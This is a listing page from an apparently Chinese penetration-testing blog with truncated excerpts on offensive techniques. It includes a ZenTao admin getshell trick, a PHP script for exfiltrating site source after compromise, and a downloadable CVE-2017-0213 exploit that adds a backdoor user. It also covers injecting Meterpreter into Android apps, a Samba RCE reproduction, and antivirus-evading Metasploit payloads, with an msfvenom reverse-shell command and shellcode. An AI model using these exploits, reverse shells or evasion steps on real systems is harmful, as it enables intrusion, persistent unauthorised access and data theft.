热门 禅道后台getshell,利用windows特性,快速确定文件名

时间:2017-7-31   作者:webbaozi   分类: 小技巧   热度:1107°    
时间:2017-7-31   分类: 小技巧    热度:1107  
如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html 这里就不多讲了 window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")'; 进入正题: index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends...

阅读全文>>

热门 使用PHP自带zlib函数打包网站源码下载zip

时间:2017-7-20   作者:webbaozi   分类: 小技巧   热度:1170°    
时间:2017-7-20   分类: 小技巧    热度:1170  
打包网站源码使用,当不能执行命令时,有些大马由于写法问题,导致不能一次下载所有源码,所以从网上摘抄了代码做了下简单的修改。 代码如下: <?php //获取文件列表 function list_dir($dir){ $result = array(); if (is_dir($dir)){ $file_dir = scandir($dir); foreach($file_dir as $file){ if ($file == '.' || $file == '..'){ ...

阅读全文>>

热门 CVE-2017-0213添加用户

时间:2017-6-16   作者:webbaozi   分类: 安全工具   热度:2086°    
时间:2017-6-16   分类: 安全工具    热度:2086  
代码摘取:https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp 源代码新建一个cmd窗口,改了下直接添加用户。 使用说明: 直接运行exe成功会添加用户 用户名:webbaozi 密码:[email protected]#123 win7测试x64(其他系统以及x86请自测): 下载地址: 链接: https://pan.baidu.com/s/1o8iD...

阅读全文>>

热门 kwetza - 向 Android 应用中注入 Meterpreter payload 的 Python 脚本

时间:2017-6-13   作者:webbaozi   分类: 实用工具   热度:1014°    
时间:2017-6-13   分类: 实用工具    热度:1014  
Getting the code Firstly get the code: git clone https://github.com/sensepost/kwetza.git Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip: pip install beautifulsoup4 Kwetza requires Apktool to be install and accessible via your PATH. This ...

阅读全文>>

热门 Samba远程代码执行漏洞利用

时间:2017-5-30   作者:webbaozi   分类: 渗透测试   热度:1119°    
时间:2017-5-30   分类: 渗透测试    热度:1119  
概述 linux或unix下所使用Samba服务允许恶意的用户上传类库到可读可写的共享目录进而导致服务器远程代码执行。 漏洞编号: CVE-2017-7494 漏洞等级: 严重 漏洞影响: Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本 默认端口: 445 漏洞复现 1.靶机环境搭建: 靶机环境系统使用kali: IP地址:192.168.10.62 [email protected]:/# uname -a Linux yunxu 4.9.0-kali3-amd64 ...

阅读全文>>

热门 Metasploit生成免杀payload笔记

时间:2017-5-22   作者:webbaozi   分类: 渗透测试   热度:1474°    
时间:2017-5-22   分类: 渗透测试    热度:1474  
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -i 11 -f py -o msf.py 然后更改z.py样式如下: from ctypes import * import ctypes buf = "" buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29" buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\x...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1